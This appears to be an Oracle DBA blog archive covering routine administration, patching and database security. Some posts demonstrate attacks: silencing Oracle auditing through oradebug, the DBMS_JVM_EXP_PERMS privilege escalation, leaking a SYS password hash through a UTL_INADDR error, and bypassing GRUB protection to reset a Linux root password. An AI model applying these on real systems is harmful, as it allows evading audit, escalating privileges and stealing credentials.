Posts

Showing posts from April, 2013

Start/Stop Oracle Enterprise Manager 12c

To start Enterprise Manager 12c, follow the steps below:

export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1
export OMS_HOME=/u03/app/oracle/Middleware/om12c/oms/
export AGENT_HOME=/u03/app/oracle/Middleware/agent12c/agent_inst/

Ensure the database and listener are running.
Run the below command from $OMS_HOME: emctl start oms
Run the below command from $AGENT_HOME: emctl start agent

To stop all the services, do the following:

export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1
export OMS_HOME=/u03/app/oracle/Middleware/om12c/oms/
export AGENT_HOME=/u03/app/oracle/Middleware/agent12c/agent_inst/

Run the below command from $OMS_HOME: emctl stop oms -all
Run the below command from $AGENT_HOME: emctl stop agent
Now you can shut down the database and listener.

Thank you
Osama mustafa




Step By Step to Install Enterprise Manager 12c on Redhat 6.1

In this article you will see how to install Oracle Enterprise Manager 12c (EM12c) on the Redhat 6 update 1 operating system.

The first step is to select a supported OS and database for the repository. You can check the certification as follows:


1. Log in to My Oracle Support, which is accessible at the following URL: https://support.oracle.com
2. Click the Certifications tab.
3. In the Certification Search region, select Enterprise Manager Cloud Control from the Product list.
4. From the Release list, select 12.1.0.2.0, then click Search.
5. Expand the Databases node.


After checking the certification, you need to install the following:
Enterprise Manager 12c, from here.
Redhat 6, from here.
If you install on Linux 64-bit, you need to apply Patch 10404530; download it from here.

Enterprise Manager has the following requirements:
Hardware minimum: 6 GB of RAM. Disk space requirements: 30 GB to 50 GB for installation of the software.
Software
OMS Package

make-3.81
binutils-2.17.50.0.6
gcc -4.1.…

Add New Mount On Linux ( Redhat 6)

Sometimes you need to add a new mount to Linux after creation. The following article describes how to do this; all the steps were tested on Redhat 6.1. After adding the disk:


[root@localhost Desktop]# fdisk -l
Disk /dev/sda: 85.9 GB, 85899345920 bytes
255 heads, 63 sectors/track, 10443 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000be2c2
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         262     2097152   83  Linux
Partition 1 does not end on cylinder boundary.
/dev/sda2             262        2220    15728640   83  Linux
/dev/sda3            2220        3525    10485760   83  Linux
/dev/sda4            3525        7833    34601984    5  Extended
/dev/sda5            3525        4831    10485760   83  Linux
/dev/sda6            4831        5484     5242880   82  Linux swap / Solaris
/dev/sda7            5484        5745     2097…

ORA-00838: Specified value of MEMORY_TARGET is too small,

SQL> startup
ORA-00838: Specified value of MEMORY_TARGET is too small, needs to be at least 3072M

Convert the value to bytes: 3072*1024*1024 = 3221225472

SQL> create pfile='/u02/backup.init' from spfile;

Edit the file and put the above number in memory_target.

SQL> create spfile from pfile='/u02/backup.init';

SQL> startup


Thank you
Osama mustafa

SQL92_SECURITY Parameter

SQL> show parameter sql92_

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
sql92_security                       boolean     FALSE

SQL92_SECURITY looks like a security-related parameter, but what is it? What are the benefits of using this parameter?

I will describe it with an example, since that makes it easier to understand :)

SQL> create user test1 identified by test1 ;

User created.

SQL> grant create session , Create table to test1 ;

Grant succeeded.

SQL>
SQL>
SQL> create user test2 identified by test2 ;

User created.

SQL> create user test3 identified by test3 ;

User created.

SQL> grant create session to test3 ;

Grant succeeded.

SQL> conn test1/test1 ;
Connected.
SQL> create table new ( id number(20)) ;

Table created.

SQL> BEGIN
    FOR v_LoopCounter IN 1..50 LOOP
    INSERT INTO new (id)
    VALUES (v_LoopCounter);
     END LOOP;
         END;
   / 

PL/SQL procedure suc…

Short Look for Oracle Privileges

Oracle Database contains two types of privileges, system and object, and each can be granted to users as needed. There is also an interesting entity called PUBLIC. It is more a role than a user, and every user created in the database is assigned to PUBLIC by default; unfortunately nothing can be done to change that. It behaves like a user group, so if you grant any privilege to PUBLIC, every database user will have that privilege (system or object). You need to be careful about what you do when dealing with PUBLIC.

PUBLIC is everyone who has access to the database. PUBLIC is an entity that can be granted any privilege and assigned any role. All database users automatically inherit all the rights assigned to PUBLIC. It’s a simple concept designed for convenience. Granting permissions to PUBLIC is easy to do, and often the easiest way to get a system working; however, the security implications of using the PUBLIC group to assign permissions are significant. P…
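
A review of what PUBLIC currently holds, as an added example that is not from the original post. The package list in the last query is an assumption: it combines two packages this page mentions (UTL_INADDR, DBMS_JVM_EXP_PERMS) with other network-, file- and Java-capable packages, and should be adjusted to your environment.

```sql
-- Added example: review what every database user inherits through PUBLIC.
-- Run as a user who can read the DBA_* dictionary views.

-- 1. System privileges granted to PUBLIC (ideally none).
SELECT privilege, admin_option
FROM   dba_sys_privs
WHERE  grantee = 'PUBLIC'
ORDER  BY privilege;

-- 2. Roles granted to PUBLIC; everything in such a role reaches every user.
SELECT granted_role, admin_option, default_role
FROM   dba_role_privs
WHERE  grantee = 'PUBLIC'
ORDER  BY granted_role;

-- 3. Object privileges granted to PUBLIC, summarised per owner and privilege,
--    to see which schemas carry most of the exposure.
SELECT owner, privilege, COUNT(*) AS grant_count
FROM   dba_tab_privs
WHERE  grantee = 'PUBLIC'
GROUP  BY owner, privilege
ORDER  BY grant_count DESC;

-- 4. EXECUTE granted to PUBLIC on packages that reach the network, the file
--    system or the Java VM. The IN list is an assumption; extend it as needed.
SELECT owner, table_name AS package_name, grantor, grantable
FROM   dba_tab_privs
WHERE  grantee   = 'PUBLIC'
AND    privilege = 'EXECUTE'
AND    table_name IN ('UTL_INADDR', 'UTL_TCP', 'UTL_SMTP', 'UTL_HTTP',
                      'UTL_FILE', 'DBMS_JAVA', 'DBMS_JVM_EXP_PERMS')
ORDER  BY owner, table_name;
```

Before revoking anything found here, check which objects depend on the grant (for example in DBA_DEPENDENCIES), since revoking from PUBLIC can invalidate them.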

what is oracle inventory

While installing Oracle software, a new directory called oinventory is created in ORACLE_BASE. What is it? What are the benefits of this folder? What kind of information is stored in it?

The inventory is created when you install the database, and is used for upgrades and patches. There are two kinds of Oracle inventory: the central inventory, one per server, and the local inventory, one for each ORACLE_HOME. The difference is that the central inventory basically contains a high-level list of components installed on the server. It is updated each time components are installed or uninstalled, but it does not have detailed information such as the patch level of each ORACLE_HOME. The local inventory, on the other hand, contains component information together with patch-level information.

Another difference is that the central inventory contains the information related to all Oracle products installed on a host, and consists of a file called inventory.xml, which lists all the Oracle …

Disable Auditing Using Oradebug

In 2011 Laszlo Toth showed some Oracle tricks to disable auditing in Oracle Database, including SYS auditing, using a simple command called oradebug. Note that oradebug is undocumented in all Oracle versions, and if you have SYSDBA privileges you can do a lot of things with this command.

The demonstration is below:


sqlplus / as sysdba

SQL> -- get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like 'kzaflg_%';

KSMFSNAM         ADDR                   INDX    INST_ID KSMMMVAL
---------------- ---------------- ---------- ---------- ----------------
kzaflg_          0000000060031BB0      26652          1 0000000000000001

SQL> show parameter audit;

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
audit_file_dest                      string      /u01/app/oracle/admin/PSALES/adump
audit_sys_operations                 boolean     TRUE
audit_syslog_level                   string
audit_trail                          string      DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000
Just as note with oradebug you Audit vault bec…

Oracle Critical Patch Updates for April 2013

The Critical Patch Update for April 2013 and The Oracle Java SE Critical Patch Update for April 2013 were released on April 16th, 2013. Oracle strongly recommends applying the patches as soon as possible. Please note that Sun products are included in this Critical Patch Update.

You can download them for free from the links below:

Oracle Technology Network: press here
Oracle Technology Network page to download the CPU patch: here
Oracle Java SE patch: press here




Thank you
Osama mustafa

Oracle Security --> Where to Start ? What to do ?

When you read the title you may start thinking of a race, which is understandable since technology moves fast. But this article is not about a race; it is about where to look when securing a database and what to secure. I have posted other articles about security, how to secure your database, and the benefits of securing a database. Here I will try to mention the most important points for securing and protecting the database, especially regarding internal users.

A database is complex, so the DBA (database administrator) must understand the potential security impacts and the three-component triangle that I mentioned before in "Top ten Threats to Database". For example, when DBAs focus on availability they may ignore correct configuration, which causes security vulnerabilities, and this can lead to exposure of confidential data. It is not only about the database: if you have an application, you need to take ownership and start securing that application too. But what can I do? Where to start and how to …

ORA-1461 encountered when generating server alert SMG-3500

Two bugs could be related to this error: Bug 6085625 and unpublished bug 6452485.

To fix the above bug you need to apply Patch 6602742 or Patch 6602482, depending on your case.


As a workaround you have two options:

A. Flush the shared pool, which can help remove the problem cursor from the shared pool.
B. Or set SESSION_CACHED_CURSORS = 0


Thank you
Osama mustafa

Oracle APPS DBA vs Oracle DBA

The names differ in one thing, Apps. Both are DBAs for the same corporation, but before going further you need to know the definition of each: what does APPS DBA mean, and what does Oracle DBA mean?

An Oracle DBA (database administrator) is the person responsible for administering, monitoring, tuning and recovering (in failure cases) the database. For Oracle Database, this person is called an Oracle DBA.

This person has a lot of jobs and tasks:

Installing and upgrading the Oracle server and application tools
Allocating system storage and planning future storage requirements for the database system
Creating primary database storage structures (tablespaces) after application developers have designed an application
Creating primary objects (tables, views, indexes) once application developers have designed an application
Modifying the database structure, as necessary, from information given by application developers
Enrolling users and maintaining system security
Ensuring compliance with your Oracle license agr…

Describe Oracle Patches

According to the Oracle documentation, a patch is a program (set of instructions) to fix a particular problem or enhance/add a particular feature in an existing program/product/software. There are four kinds of Oracle patches:

One-off patches (bug fix)
CPU (security patches)
Upgrade patches (bug fixes)
PSU (bug fixes are security patches)

There is another kind called Bundle Patches, for Windows and Exadata.
The two kinds of patch that people get a little confused about are CPU and PSU. What are they? When should I use them? Is there any difference between them?

The first thing to know is that since they have different names, they are surely different.

CPU: security fixes each quarter rather than the cumulative database.

PSU: same as CPU patches, but includes both the security fixes and priority fixes.
Note: Once a PSU is applied, only PSUs can be applied in future quarters until the database is upgraded to a new base version.
Which means you can't apply CPU and PSU …

DBMS_JVM_EXP_PERMS OS Command Execution / Hack Oracle

DBMS_JVM_EXP_PERMS is a package that allows any user with the CREATE SESSION privilege to grant themselves Java IO privileges. The issue was identified by David Litchfield. Note that this technique only works on Windows, and the affected Oracle Database versions are 10gR2, 11gR1 and 11gR2.

The demonstration below explains how it is used:

SQL> CONNECT / AS SYSDBA
Connected.
SQL> CREATE USER Test IDENTIFIED BY Test;

User created.

SQL> GRANT CREATE SESSION TO Test;

Grant succeeded.

SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 'TEST';

no rows selected

SQL> CONNECT Test/test
Connected.

SQL> DECLARE
   POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
   CURSOR C1 IS SELECT
'GRANT','GREMLIN','SYS','java.io.FilePermission','<FILES>>','execute','ENABLED' FROM DUAL; 
  BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  END;…

Hack Sys Password With Simple Way

Sometimes you want to find out the SYS password in the simplest way. If you have any user with the DBA role, you can do that as shown below:

SQL>  select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual;
 select utl_inaddr.get_host_name((
        *
ERROR at line 1:
ORA-29257: host SYS=8A8F025737A9097Aunknown
ORA-06512: at "SYS.UTL_INADDR", line 4
ORA-06512: at "SYS.UTL_INADDR", line 35
ORA-06512: at line 1

Now you can use any software or online site to hack this password.

Thank you
Osama Mustafa

Basic Database Security GuideLines

Implementing database security is not an easy process. It is complex, since security has to be looked at across the OS layer, database, network, application code and backups. There are a lot of things to check, and if you need a secure database you can't ignore any of these components.

Even experts/gurus do not have a complete understanding of everything on this list; they may have knowledge of it, but not in depth. The most important thing in securing a database (a new one) or an application is understanding the security model very early in the development process, and how to develop it. You can read the book "Oracle security: Step-by-step" by Pete Finnigan; he covers a lot of basic steps to secure an Oracle database.


From a high level perspective, security is always about risk. If you think that your system is impenetrable, think again. Someone else will always be building a better mousetrap.

For example, if we asked ourselves as DBAs about SQL injection o…

ORA-0131: insufficient privileges/could not validate ASMSNMP password

This error is related to the ASM instance. It usually happens when you are trying to create dbconsole. The solution is simple; just follow the instructions below.


Choose one of the RAC (Real Application Cluster) nodes and run the below command as the grid user:

 orapwd file=/u01/app/11.2.0/grid/dbs/orapw+ASM password=

Now move the file (orapw+ASM) to the other nodes using scp, or any FTP software you like. To learn about scp, see here. Check the below example:

scp orapw+ASM :/u01/app/11.2.0/grid/dbs/

Back as the oracle user:

export ORACLE_SID=+ASM1
export ORACLE_HOME=/u01/app/11.2.0/grid
$ sqlplus / as sysasm
SQL>create user asmsnmp identified by ;
SQL> grant sysdba to asmsnmp;
Thank you
Osama Mustafa

Hack Root Password With Protected Grub

I previously posted an article about "Hack Root Password With Protected Grub" here.

But what if GRUB is locked with a password and you forgot the root password? There is always a way to do it, but you need the same installation media for the operating system (I never tried a different distribution). After booting:

In the above screen, type "linux rescue" and then press Enter.

Then follow the instructions and enter Bash:

chroot /mnt/sysimage [Enter]
cd /boot/grub [Enter]
vi menu.lst

In that file you will see the word "Password". Remove that line; this removes the GRUB password. After you save it, the OS will reboot, but this time GRUB will be unprotected. Remove the CD and follow the normal instructions in article number one, here.

Thank you
Osama Mustafa


rdesktop: A Remote Desktop Protocol Client

rdesktop is an open source client for Windows Remote Desktop Services, capable of natively speaking Remote Desktop Protocol (RDP) in order to present the user's Windows desktop. rdesktop is known to work with Windows versions such as NT 4 Terminal Server, 2000, XP, 2003, 2003 R2, Vista, 2008, 7, and 2008 R2. Click Here.


You can install the package using yum, like the below:
# rpm -qa rdesktop
According to the website, to connect to Windows from Linux you use -u to indicate the username, followed by the hostname, like this:
# rdesktop -u Administrator osama
Osama : hostname
Administrator : Username






Useful !!!


Thank you
Osama mustafa

Reset/Hack Linux Root Password ( Unprotected GRUB )

Do you want to learn something new? Hack/reset the Linux root password, then continue reading.

Root is the user name or account that by default has access to all commands and files on a Linux or other Unix-like operating system. It is also referred to as the root account, root user and the superuser.

What if I forget the root password? Check the below.

Restart the server and you should see this screen; pause it by pressing an arrow key:

Second, press "a", then add "1" like the below screen; when finished press Enter:

Now a black screen:

Print "Runlevel"

and reset the root password by typing the "passwd" command, like the below:

Note: This way works with Redhat, Fedora and CentOS; I didn't try it on Ubuntu.

Thank you
Osama mustafa







Oracle Database vs Sql Server Security

Which one is the more secure ?

The above question has been asked before, and will be asked today and in the future, but what is the answer? Before answering this question we need to discuss some points.

As an introduction, SQL Server is a database product from Microsoft Corporation with the following version list:

SQL Server 2012
SQL Server 2008 R2
SQL Server 2008
SQL Server 2005
SQL Server 2000
SQL Server 7.0

On the other hand we have Oracle Database, which is an RDBMS (Relational Database Management System) with the following version list:

Oracle7
Oracle8 Database
Oracle8i Database
Oracle9i Database
Oracle Database 10g
Oracle Database 11g

Each database version includes new features, which could be related to high availability, database features and security features. I try to be fair in my judgment. Let's get back to the question: which is more secure, Oracle Database or Microsoft SQL Server, and why?
I read a lot of research regarding this question, and most of it claims that sql server …

Sys Password and Alter User Privileges

While browsing I found this topic, which is really useful if you are interested in securing your database. I mentioned before in my posts that to secure a database you need to start with simple steps first; the below is one of them:
SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent='ALTER' and ora_dict_obj_type = 'USER' and
(ora_dict_obj_name = 'SYSTEM' or ora_dict_obj_name = 'SYS')
THEN
RAISE_APPLICATION_ERROR(-20003,
'You are not allowed to alter SYSTEM/SYS user.');
END IF;
END;
/

Trigger created.

SQL> conn scott/tiger
Connected.

SQL>alter user system identified by new_password;
alter user system identified by new_password
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5

SQL> alter user sys identified by new_password;
alter user sys identified by new_password
*
ERROR at line 1:
ORA-00604: error occurred a…